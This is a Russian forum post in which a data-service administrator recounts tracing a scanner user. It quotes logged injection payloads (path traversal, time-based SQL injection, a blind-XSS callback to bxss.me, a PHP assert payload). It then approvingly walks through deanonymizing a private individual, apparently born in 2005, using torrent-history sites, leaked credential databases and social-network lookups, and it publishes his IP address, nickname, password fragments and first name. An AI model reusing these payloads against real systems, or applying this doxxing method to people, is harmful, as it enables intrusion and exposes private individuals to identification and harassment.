Как вычислить по IP? Реальный пример деанонимизации «хакера»

Kate

Administrator
Команда форума
Наша организация занимается сбором больших данных из телеграм, а также множеством других услуг связанных с телегой. Мы даем пользователям возможность поиска по нашим базам данных и постоянно сталкиваемся с тем, что кто-нибудь пытается искать в наших скриптах уязвимости, в том числе xss, sqlinj, phpinc и т.д. Мы учитываем возможные риски и стараемся очень тщательно фильтровать пользовательский input. В один из дней мы заметили подозрительную активность, пользователь отправил в поиск каталога телеграм каналов 8583 запроса за короткий промежуток времени и пытался внедрить спецсимволы, наши скрипты отработали как надо и обрезали потенциально опасный payload, но в админке слетел вывод json в таблице активности пользователей, которую быстро удалось восстановить в рабочее состояние.

Из таблицы активности пользователей стало ясно, что пользователь использовал автоматизированное ПО сканер для поиска потенциальных уязвимостей на нашем сайте, т.к. интервалы между большинством запросов были около 1 сек и всего за несколько часов было 8583 запроса. Даже Яндекс Метрика не записала никаких действий в этот период времени, т.к. запросы делались не через браузер, поэтому скрипты Яндекс Метрики не загружались и не фиксировали посещения каталога.

3be41d84defd789f7edf7e39426af2c1.png

Все запросы были с одного IP-адреса 46.159.122.238.

Вот примеры некоторых из них:

../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd

to@example.com,bcc:074 625.180–11 320.180.d49f3.19 464.2@bxss.me
+response.write90 222 479 510 213+
the||DBMS_PIPE.RECEIVE_MESSAGECHR98||CHR98||CHR98,15||
9SKpkoxn OR 273=SELECT 273 FROM PG_SLEEP15--
H6TY5zpX; waitfor delay 0:0:15 ‑-
index.php/.
select0fromselectsleep15v/+select0fromselectsleep15v++select0fromselectsleep15v+/
0XORifnow=sysdate,sleep15,0XORZ
-1 OR 2+323–323–1=0+0+0+1 ‑-

HttP://bxss.me/t/xss.html?00
;assertbase64_decodecHJpbnQobWQ1KDMxMzM3KSk7;
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
echo mmaxpk” class=”formula inline”> tjjjrl
Решено было провести базовые этапы идентификации IP-адреса для выявления предполагаемого злодея.

0c1d07d06c72c0b11c5105112642b060.png

Этап 1. Проверка страны IP-адреса​

Для определения страны IP-адреса не принципиально каким сервисом вы будете пользоваться. Я предпочитаю использовать whoerNet и он показал, что IP-адрес принадлежит Российскому провайдеру. Многие сайты не могут верно определить город IP-адреса, но в случае с российскими провайдерам очень хорошо с этой задачей справляется reg.ru/web-tools/geoip и решено было проверить повторно этот IP-адрес там. В результате мы узнали, что предполагаемый хацкер находится в Краснодаре.

370e0296c870fe8b085b4118c168d30b.png

Этап 2. Поиск IP-адреса на торрент трекерах​

Многие не задумываются, но когда вы качаете что-нибудь с торрентов ваш IP-адрес может посмотреть любой желающий, если у него будет доступ к *.torrent файлу при помощи которого вы скачиваете свой фильм или сериал. Об этом также задумались создатели сервиса iknowwhatyoudownload и начали собирать базу данных по пирам и сидам всех публичных *.torrent файлов, а затем сделали бесплатный поиск по собранным данным. Вбиваем туда IP адрес нашего злодея и узнаем, что не так давно он качал 19 различных торрентов по которым можно собрать небольшой психологических портрет, а самое интересное, что он качал сериал Хакер. Наверное для того чтобы набраться опыта 😀

9c1148d36e23800bdc42dac3a10bec96.png

Этап 3. Проверка IP-адреса по google доркам​

Google Hacking Tests и Pentest-Tools - позволят быстро сгенерировать правильные запросы в гугл для поиска IP-адреса среди:

  1. Публичных и уязвимых каталогов
  2. Файлов конфигурации
  3. Файлов баз данных
  4. Логов
  5. Старых данных и данных резервного копирования
  6. Страниц аутентификации
  7. Ошибок SQL
  8. Документов хранящихся в общем доступе
  9. Информации о конфигурации php на сервере («phpinfo»)
  10. Файлов общего интерфейса шлюза (CGI)
03856bba4069d30b962c6ea38258bffd.png
10de40026298ff32735fa338f24cc6ef.png

Этот этап не дал никакого результата.

Этап 4. Поиск доменов привязанных к IP-адресу​

Из прошлых этапов стало ясно, что злодей использует статический IP. Так как в разный период времени этот IP выпадает конкретно ему. Поэтому следующим этапом логично было проверить этот IP на привязку к сайтам, возможно он поднимал на своей локальной машине какой-нибудь сайт и специальные сервисы успели это засечь и поместить в свои базы данных. Пробую искать через сервис 2ip так как мой любимый domainbigdata по какой-то причине не доступен.

07e7a2ef1261bef0bfd9c5765ce013ea.png

Этот этап также не дал никакого результата.

Этап 5. Поиск Skype аккаунта по IP-адресу​

Хоть Skype уже не так популярен как в 2012, но все же есть люди, которые его используют. А раз его все еще кто-то использует, то продолжают существовать сервисы, которые помогают найти логин Skype по IP адресу. Я использую сервис webresolver, но он также не дал никакого результата.

4f33e29f5d0918bea90b3a4b784c1e9f.png

Этап 6. Поиск IP-адреса в утекших базах данных​

Немаловажным этапом любого интернет расследования являются утекшие базы данных различных сервисов. Особенно если мы используем базы данных не по отдельности, а при помощи поисковика, который собрал все базы данных в кучу и дал возможность поиска в один клик. Использую поисковик по утечкам leak-lookup и получаю еще одну зацепку.

6b29568c4560ed79cbdfcdd0d3f94706.png

В 2021 году этот IP-адрес засветился на сайте litecloud.me и его использовал пользователь с ником hardc0r_darkteam, а конкретно приставка darkteam как и скаченный торрент с сериалом Хакер указывают на то, что мы двигаемся в правильном направлении. Можно предположить, что 2005 в пароле указывает на год рождения злодея, а danil указывает на имя.

На этом этапе было решено оставить поиск по IP-адресу и переключиться на поиск по username и password, которые может использовать злодей. Следующий этап рассмотрим вкратце пропуская некоторые пункты так как там мы уже не будем работать с IP-адресом.

Финальный этап​

  1. Поиск по нику дает нам еще один сайт, где встречался этот логин, но лучше от этого не становится.
  2. Поиск по паролю дает почти 2000 результатов из которых сложно найти что-то конкретное.
  3. Идем искать ник hardc0r_darkteam в google и yandex, но не получаем никакого результата.
  4. Пробуем обрезать “_darkteam” от ника и “2005” от пароля, а затем поискать в hardc0r + danil. Получаем еще одну зацепку на сайте kwork
629e1e72fbd47da9cc55d47acb417861.png

  1. Далее ищем уже все 3 слова и находим сообщество ВКонтакте в котором всего 2 участника и один из них человек с именем Данил.
905f3045832945e96498ae85ace0ec5c.png

  1. Изучаем страницу Данила и понимаем, что год рождения на его странице скрыт. Пробиваем год рождения через сервис 220vk и узнаем, что его год 2005 прям как в пароле у пользователя hardc0r_darkteam, а также приставка “_it” в его логине ВК и более 10 сообществ по программированию указывают на то, что злодеем все это время был именно он.
324688262bac3508ee52a0dce1123b50.png


 
Сверху